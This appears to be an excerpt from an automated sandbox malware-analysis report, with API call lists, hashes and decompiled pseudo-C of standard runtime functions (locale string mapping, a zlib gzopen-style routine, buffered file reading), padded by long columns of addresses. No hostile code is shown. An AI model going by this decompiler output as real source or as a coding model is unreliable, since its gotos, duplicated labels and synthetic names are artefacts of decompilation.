                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004170ea
                                                                        0x004170ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004170ef
                                                                        0x00000000
                                                                        0x004170ef
                                                                        0x004170f7
                                                                        0x004170fb
                                                                        0x004170fd
                                                                        0x004170fd
                                                                        0x004170fe
                                                                        0x00000000

                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,020318D8), ref: 004170C5
                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                        • __freea.LIBCMT ref: 004172A4
                                                                        • __freea.LIBCMT ref: 004172AD
                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                        • _malloc.LIBCMT ref: 00417362
                                                                        • _memset.LIBCMT ref: 00417384
                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                        • __freea.LIBCMT ref: 004173CF
                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                        • String ID:
                                                                        • API String ID: 3809854901-0
                                                                        • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                        • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E004057B0(intOrPtr* __eax) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t57;
                                                                        				char* _t60;
                                                                        				char _t62;
                                                                        				intOrPtr _t63;
                                                                        				char _t64;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t69;
                                                                        				intOrPtr _t70;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr* _t83;
                                                                        				void* _t86;
                                                                        				char* _t88;
                                                                        				char* _t89;
                                                                        				intOrPtr* _t91;
                                                                        				intOrPtr* _t93;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				void* _t100;
                                                                        				void* _t101;
                                                                        				void* _t102;
                                                                        				void* _t103;
                                                                        				void* _t104;
                                                                        
                                                                        				_t98 = _t97 | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                        				_t91 = __eax;
                                                                        				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                        				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                        					_t101 = _t100 + 4;
                                                                        					if(_t93 == 0) {
                                                                        						L31:
                                                                        						return 0;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                        						 *_t93 = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                        						 *(_t93 + 0x6c) = _t98;
                                                                        						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                        						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                        						_t102 = _t101 + 0xc;
                                                                        						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                        						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                        						_t87 = _t57 + 1;
                                                                        						do {
                                                                        							_t82 =  *_t57;
                                                                        							_t57 = _t57 + 1;
                                                                        						} while (_t82 != 0);
                                                                        						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                        						_t103 = _t102 + 4;
                                                                        						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                        						if(_t60 == 0) {
                                                                        							L30:
                                                                        							E00405160(0, _t87, _t93);
                                                                        							goto L31;
                                                                        						} else {
                                                                        							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                        							_t88 = _t60;
                                                                        							goto L7;
                                                                        							L9:
                                                                        							L9:
                                                                        							if( *_t91 == 0x72) {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                        							}
                                                                        							_t63 =  *_t91;
                                                                        							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                        							}
                                                                        							_t64 =  *_t91;
                                                                        							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                        								__eflags = _t64 - 0x66;
                                                                        								if(_t64 != 0x66) {
                                                                        									__eflags = _t64 - 0x68;
                                                                        									if(_t64 != 0x68) {
                                                                        										__eflags = _t64 - 0x52;
                                                                        										if(_t64 != 0x52) {
                                                                        											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                        											 *_t89 = _t64;
                                                                        											_t87 = _t89 + 1;
                                                                        											__eflags = _t87;
                                                                        											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                        										} else {
                                                                        											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                        										}
                                                                        									} else {
                                                                        										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                        									}
                                                                        								} else {
                                                                        									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                        								}
                                                                        							} else {
                                                                        								_t98 = _t64 - 0x30;
                                                                        							}
                                                                        							_t91 = _t91 + 1;
                                                                        							if(_t64 == 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_t87 = _t103 + 0x68;
                                                                        							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                        								goto L9;
                                                                        							}
                                                                        							L26:
                                                                        							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                        							if(_t65 == 0) {
                                                                        								goto L30;
                                                                        							} else {
                                                                        								if(_t65 != 0x77) {
                                                                        									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                        									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                        									 *_t93 = _t66;
                                                                        									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                        									_t104 = _t103 + 0x14;
                                                                        									__eflags = _t67;
                                                                        									if(_t67 != 0) {
                                                                        										goto L30;
                                                                        									} else {
                                                                        										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                        										if(__eflags == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											goto L34;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									_push(0x38);
                                                                        									_push("1.2.3");
                                                                        									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                        									_push(8);
                                                                        									_push(0xfffffff1);
                                                                        									_push(8);
                                                                        									_push(_t98);
                                                                        									_push(_t93);
                                                                        									_t91 = E00404CE0();
                                                                        									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                        									_t104 = _t103 + 0x24;
                                                                        									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                        									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                        									if(_t91 != 0 || _t79 == 0) {
                                                                        										goto L30;
                                                                        									} else {
                                                                        										L34:
                                                                        										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                        										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                        										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                        										__eflags = _t69;
                                                                        										_push(_t104 + 0x18);
                                                                        										if(__eflags >= 0) {
                                                                        											_push(_t69);
                                                                        											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                        										} else {
                                                                        											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                        											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                        											_t70 = E0040CB9D();
                                                                        										}
                                                                        										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                        										__eflags = _t70;
                                                                        										if(_t70 == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                        											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                        												E00405000(_t93, 0);
                                                                        												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                        												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                        												__eflags = _t74;
                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                        												return _t93;
                                                                        											} else {
                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                        												return _t93;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L42;
                                                                        							L7:
                                                                        							_t62 =  *_t83;
                                                                        							 *_t88 = _t62;
                                                                        							_t83 = _t83 + 1;
                                                                        							_t88 = _t88 + 1;
                                                                        							if(_t62 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0;
                                                                        							}
                                                                        							goto L9;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L42:
                                                                        			}

































                                                                        0x004057b7
                                                                        0x004057bf
                                                                        0x004057c3
                                                                        0x004057c5
                                                                        0x004057cd
                                                                        0x004059c8
                                                                        0x004059ce
                                                                        0x004057db
                                                                        0x004057e3
                                                                        0x004057e5
                                                                        0x004057ea
                                                                        0x00405921
                                                                        0x0040592a
                                                                        0x004057f0
                                                                        0x004057f3
                                                                        0x004057f6
                                                                        0x004057f9
                                                                        0x004057fc
                                                                        0x004057ff
                                                                        0x00405801
                                                                        0x00405804
                                                                        0x00405807
                                                                        0x0040580a
                                                                        0x0040580d
                                                                        0x00405810
                                                                        0x00405813
                                                                        0x00405816
                                                                        0x00405819
                                                                        0x0040581c
                                                                        0x00405824
                                                                        0x00405827
                                                                        0x0040582b
                                                                        0x0040582e
                                                                        0x00405831
                                                                        0x00405834
                                                                        0x00405837
                                                                        0x00405837
                                                                        0x00405839
                                                                        0x0040583a
                                                                        0x00405842
                                                                        0x00405847
                                                                        0x0040584a
                                                                        0x0040584f
                                                                        0x0040591c
                                                                        0x0040591c
                                                                        0x00000000
                                                                        0x00405855
                                                                        0x00405855
                                                                        0x00405859
                                                                        0x0040585b
                                                                        0x00000000
                                                                        0x00405870
                                                                        0x00405872
                                                                        0x00405874
                                                                        0x00405874
                                                                        0x00405877
                                                                        0x0040587b
                                                                        0x00405881
                                                                        0x00405881
                                                                        0x00405885
                                                                        0x00405889
                                                                        0x00405897
                                                                        0x00405899
                                                                        0x004058a5
                                                                        0x004058a7
                                                                        0x004058b3
                                                                        0x004058b5
                                                                        0x004058c1
                                                                        0x004058c5
                                                                        0x004058c7
                                                                        0x004058c7
                                                                        0x004058c8
                                                                        0x004058b7
                                                                        0x004058b7
                                                                        0x004058b7
                                                                        0x004058a9
                                                                        0x004058a9
                                                                        0x004058a9
                                                                        0x0040589b
                                                                        0x0040589b
                                                                        0x0040589b
                                                                        0x0040588f
                                                                        0x00405892
                                                                        0x00405892
                                                                        0x004058cc
                                                                        0x004058cf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004058d1
                                                                        0x004058d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004058db
                                                                        0x004058db
                                                                        0x004058e0
                                                                        0x00000000
                                                                        0x004058e2
                                                                        0x004058e4
                                                                        0x00405930
                                                                        0x0040593f
                                                                        0x00405942
                                                                        0x00405944
                                                                        0x00405949
                                                                        0x0040594c
                                                                        0x0040594e
                                                                        0x00000000
                                                                        0x00405950
                                                                        0x00405950
                                                                        0x00405953
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405953
                                                                        0x004058e6
                                                                        0x004058ea
                                                                        0x004058ec
                                                                        0x004058f1
                                                                        0x004058f2
                                                                        0x004058f4
                                                                        0x004058f6
                                                                        0x004058f8
                                                                        0x004058f9
                                                                        0x00405904
                                                                        0x00405906
                                                                        0x0040590b
                                                                        0x0040590e
                                                                        0x00405911
                                                                        0x00405916
                                                                        0x00000000
                                                                        0x00405955
                                                                        0x00405955
                                                                        0x00405955
                                                                        0x00405961
                                                                        0x00405963
                                                                        0x00405967
                                                                        0x0040596d
                                                                        0x0040596e
                                                                        0x0040597c
                                                                        0x0040597d
                                                                        0x00405970
                                                                        0x00405970
                                                                        0x00405974
                                                                        0x00405975
                                                                        0x00405975
                                                                        0x00405985
                                                                        0x00405988
                                                                        0x0040598a
                                                                        0x00000000
                                                                        0x0040598c
                                                                        0x0040598c
                                                                        0x00405990
                                                                        0x004059a5
                                                                        0x004059ad
                                                                        0x004059b6
                                                                        0x004059b6
                                                                        0x004059b9
                                                                        0x004059c5
                                                                        0x00405992
                                                                        0x00405992
                                                                        0x004059a2
                                                                        0x004059a2
                                                                        0x00405990
                                                                        0x0040598a
                                                                        0x00405916
                                                                        0x004058e4
                                                                        0x00000000
                                                                        0x00405860
                                                                        0x00405860
                                                                        0x00405862
                                                                        0x00405864
                                                                        0x00405865
                                                                        0x00405868
                                                                        0x00000000
                                                                        0x0040586a
                                                                        0x0040586a
                                                                        0x0040586d
                                                                        0x00000000
                                                                        0x00405868
                                                                        0x0040584f
                                                                        0x004057ea
                                                                        0x00000000

                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                        • _malloc.LIBCMT ref: 00405842
                                                                        • _malloc.LIBCMT ref: 00405906
                                                                        • _malloc.LIBCMT ref: 00405930
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _malloc$AllocateHeap
                                                                        • String ID: 1.2.3
                                                                        • API String ID: 680241177-2310465506
                                                                        • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                        • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                        				signed int _v8;
                                                                        				char* _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t90;
                                                                        				intOrPtr* _t92;
                                                                        				signed int _t94;
                                                                        				char _t97;
                                                                        				signed int _t105;
                                                                        				void* _t106;
                                                                        				signed int _t107;
                                                                        				signed int _t110;
                                                                        				signed int _t113;
                                                                        				intOrPtr* _t114;
                                                                        				signed int _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        				char* _t121;
                                                                        				signed int _t125;
                                                                        				signed int _t131;
                                                                        				signed int _t133;
                                                                        				void* _t134;
                                                                        
                                                                        				_t125 = __edx;
                                                                        				_t121 = _a4;
                                                                        				_t119 = _a8;
                                                                        				_t131 = 0;
                                                                        				_v12 = _t121;
                                                                        				_v8 = _t119;
                                                                        				if(_a12 == 0 || _a16 == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t138 = _t121;
                                                                        					if(_t121 != 0) {
                                                                        						_t133 = _a20;
                                                                        						__eflags = _t133;
                                                                        						if(_t133 == 0) {
                                                                        							L9:
                                                                        							__eflags = _t119 - 0xffffffff;
                                                                        							if(_t119 != 0xffffffff) {
                                                                        								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                        								_t134 = _t134 + 0xc;
                                                                        							}
                                                                        							__eflags = _t133 - _t131;
                                                                        							if(__eflags == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t94 = _t90 | 0xffffffff;
                                                                        								_t125 = _t94 % _a12;
                                                                        								__eflags = _a16 - _t94 / _a12;
                                                                        								if(__eflags > 0) {
                                                                        									goto L3;
                                                                        								}
                                                                        								L13:
                                                                        								_t131 = _a12 * _a16;
                                                                        								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                        								_v20 = _t131;
                                                                        								_t120 = _t131;
                                                                        								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                        									_v16 = 0x1000;
                                                                        								} else {
                                                                        									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                        								}
                                                                        								__eflags = _t131;
                                                                        								if(_t131 == 0) {
                                                                        									L40:
                                                                        									return _a16;
                                                                        								} else {
                                                                        									do {
                                                                        										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                        										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                        											L24:
                                                                        											__eflags = _t120 - _v16;
                                                                        											if(_t120 < _v16) {
                                                                        												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                        												__eflags = _t97 - 0xffffffff;
                                                                        												if(_t97 == 0xffffffff) {
                                                                        													L48:
                                                                        													return (_t131 - _t120) / _a12;
                                                                        												}
                                                                        												__eflags = _v8;
                                                                        												if(_v8 == 0) {
                                                                        													L44:
                                                                        													__eflags = _a8 - 0xffffffff;
                                                                        													if(__eflags != 0) {
                                                                        														E0040BA30(_t131, _a4, 0, _a8);
                                                                        														_t134 = _t134 + 0xc;
                                                                        													}
                                                                        													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													L4:
                                                                        													E0040E744(_t125, _t131, _t133);
                                                                        													goto L5;
                                                                        												}
                                                                        												_t123 = _v12;
                                                                        												_v12 = _v12 + 1;
                                                                        												 *_v12 = _t97;
                                                                        												_t120 = _t120 - 1;
                                                                        												_t70 =  &_v8;
                                                                        												 *_t70 = _v8 - 1;
                                                                        												__eflags =  *_t70;
                                                                        												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                        												goto L39;
                                                                        											}
                                                                        											__eflags = _v16;
                                                                        											if(_v16 == 0) {
                                                                        												_t105 = 0x7fffffff;
                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                        												if(_t120 <= 0x7fffffff) {
                                                                        													_t105 = _t120;
                                                                        												}
                                                                        											} else {
                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                        												if(_t120 <= 0x7fffffff) {
                                                                        													_t55 = _t120 % _v16;
                                                                        													__eflags = _t55;
                                                                        													_t125 = _t55;
                                                                        													_t110 = _t120;
                                                                        												} else {
                                                                        													_t125 = 0x7fffffff % _v16;
                                                                        													_t110 = 0x7fffffff;
                                                                        												}
                                                                        												_t105 = _t110 - _t125;
                                                                        											}
                                                                        											__eflags = _t105 - _v8;
                                                                        											if(_t105 > _v8) {
                                                                        												goto L44;
                                                                        											} else {
                                                                        												_push(_t105);
                                                                        												_push(_v12);
                                                                        												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                        												_pop(_t123);
                                                                        												_push(_t106);
                                                                        												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                        												_t134 = _t134 + 0xc;
                                                                        												__eflags = _t107;
                                                                        												if(_t107 == 0) {
                                                                        													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                        													goto L48;
                                                                        												}
                                                                        												__eflags = _t107 - 0xffffffff;
                                                                        												if(_t107 == 0xffffffff) {
                                                                        													L47:
                                                                        													_t80 = _t133 + 0xc;
                                                                        													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                        													__eflags =  *_t80;
                                                                        													goto L48;
                                                                        												}
                                                                        												_v12 = _v12 + _t107;
                                                                        												_t120 = _t120 - _t107;
                                                                        												_v8 = _v8 - _t107;
                                                                        												goto L39;
                                                                        											}
                                                                        										}
                                                                        										_t113 =  *(_t133 + 4);
                                                                        										__eflags = _t113;
                                                                        										if(__eflags == 0) {
                                                                        											goto L24;
                                                                        										}
                                                                        										if(__eflags < 0) {
                                                                        											goto L47;
                                                                        										}
                                                                        										_t131 = _t120;
                                                                        										__eflags = _t120 - _t113;
                                                                        										if(_t120 >= _t113) {
                                                                        											_t131 = _t113;
                                                                        										}
                                                                        										__eflags = _t131 - _v8;
                                                                        										if(_t131 > _v8) {
                                                                        											_t133 = 0;
                                                                        											__eflags = _a8 - 0xffffffff;
                                                                        											if(__eflags != 0) {
                                                                        												E0040BA30(_t131, _a4, 0, _a8);
                                                                        												_t134 = _t134 + 0xc;
                                                                        											}
                                                                        											_t114 = E0040BFC1(__eflags);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											 *_t114 = 0x22;
                                                                        											_push(_t133);
                                                                        											goto L4;
                                                                        										} else {
                                                                        											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                        											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                        											 *_t133 =  *_t133 + _t131;
                                                                        											_v12 = _v12 + _t131;
                                                                        											_t120 = _t120 - _t131;
                                                                        											_t134 = _t134 + 0x10;
                                                                        											_v8 = _v8 - _t131;
                                                                        											_t131 = _v20;
                                                                        										}
                                                                        										L39:
                                                                        										__eflags = _t120;
                                                                        									} while (_t120 != 0);
                                                                        									goto L40;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t118 = _t90 | 0xffffffff;
                                                                        						_t90 = _t118 / _a12;
                                                                        						_t125 = _t118 % _a12;
                                                                        						__eflags = _a16 - _t90;
                                                                        						if(_a16 <= _t90) {
                                                                        							goto L13;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					L3:
                                                                        					_t92 = E0040BFC1(_t138);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					 *_t92 = 0x16;
                                                                        					_push(_t131);
                                                                        					goto L4;
                                                                        				}
                                                                        			}





























                                                                        0x0040bcc2
                                                                        0x0040bcca
                                                                        0x0040bcce
                                                                        0x0040bcd3
                                                                        0x0040bcd5
                                                                        0x0040bcd8
                                                                        0x0040bcde
                                                                        0x0040bd01
                                                                        0x00000000
                                                                        0x0040bce5
                                                                        0x0040bce5
                                                                        0x0040bce7
                                                                        0x0040bd08
                                                                        0x0040bd0b
                                                                        0x0040bd0d
                                                                        0x0040bd1c
                                                                        0x0040bd1c
                                                                        0x0040bd1f
                                                                        0x0040bd24
                                                                        0x0040bd29
                                                                        0x0040bd29
                                                                        0x0040bd2c
                                                                        0x0040bd2e
                                                                        0x00000000
                                                                        0x0040bd30
                                                                        0x0040bd30
                                                                        0x0040bd35
                                                                        0x0040bd38
                                                                        0x0040bd3b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bd3d
                                                                        0x0040bd40
                                                                        0x0040bd44
                                                                        0x0040bd4b
                                                                        0x0040bd4e
                                                                        0x0040bd50
                                                                        0x0040bd5a
                                                                        0x0040bd52
                                                                        0x0040bd55
                                                                        0x0040bd55
                                                                        0x0040bd61
                                                                        0x0040bd63
                                                                        0x0040be53
                                                                        0x00000000
                                                                        0x0040bd69
                                                                        0x0040bd69
                                                                        0x0040bd69
                                                                        0x0040bd70
                                                                        0x0040bdb6
                                                                        0x0040bdb6
                                                                        0x0040bdb9
                                                                        0x0040be24
                                                                        0x0040be2a
                                                                        0x0040be2d
                                                                        0x0040beb8
                                                                        0x00000000
                                                                        0x0040bebe
                                                                        0x0040be33
                                                                        0x0040be37
                                                                        0x0040be87
                                                                        0x0040be87
                                                                        0x0040be8b
                                                                        0x0040be95
                                                                        0x0040be9a
                                                                        0x0040be9a
                                                                        0x0040bea2
                                                                        0x0040beaa
                                                                        0x0040beab
                                                                        0x0040beac
                                                                        0x0040bead
                                                                        0x0040beae
                                                                        0x0040bcf9
                                                                        0x0040bcf9
                                                                        0x00000000
                                                                        0x0040bcfe
                                                                        0x0040be39
                                                                        0x0040be3c
                                                                        0x0040be3f
                                                                        0x0040be44
                                                                        0x0040be45
                                                                        0x0040be45
                                                                        0x0040be45
                                                                        0x0040be48
                                                                        0x00000000
                                                                        0x0040be48
                                                                        0x0040bdbb
                                                                        0x0040bdbf
                                                                        0x0040bde0
                                                                        0x0040bde5
                                                                        0x0040bde7
                                                                        0x0040bde9
                                                                        0x0040bde9
                                                                        0x0040bdc1
                                                                        0x0040bdc8
                                                                        0x0040bdca
                                                                        0x0040bdd7
                                                                        0x0040bdd7
                                                                        0x0040bdd7
                                                                        0x0040bdda
                                                                        0x0040bdcc
                                                                        0x0040bdce
                                                                        0x0040bdd1
                                                                        0x0040bdd1
                                                                        0x0040bddc
                                                                        0x0040bddc
                                                                        0x0040bdeb
                                                                        0x0040bdee
                                                                        0x00000000
                                                                        0x0040bdf4
                                                                        0x0040bdf4
                                                                        0x0040bdf5
                                                                        0x0040bdf9
                                                                        0x0040bdfe
                                                                        0x0040bdff
                                                                        0x0040be00
                                                                        0x0040be05
                                                                        0x0040be08
                                                                        0x0040be0a
                                                                        0x0040bec6
                                                                        0x00000000
                                                                        0x0040bec6
                                                                        0x0040be10
                                                                        0x0040be13
                                                                        0x0040beb4
                                                                        0x0040beb4
                                                                        0x0040beb4
                                                                        0x0040beb4
                                                                        0x00000000
                                                                        0x0040beb4
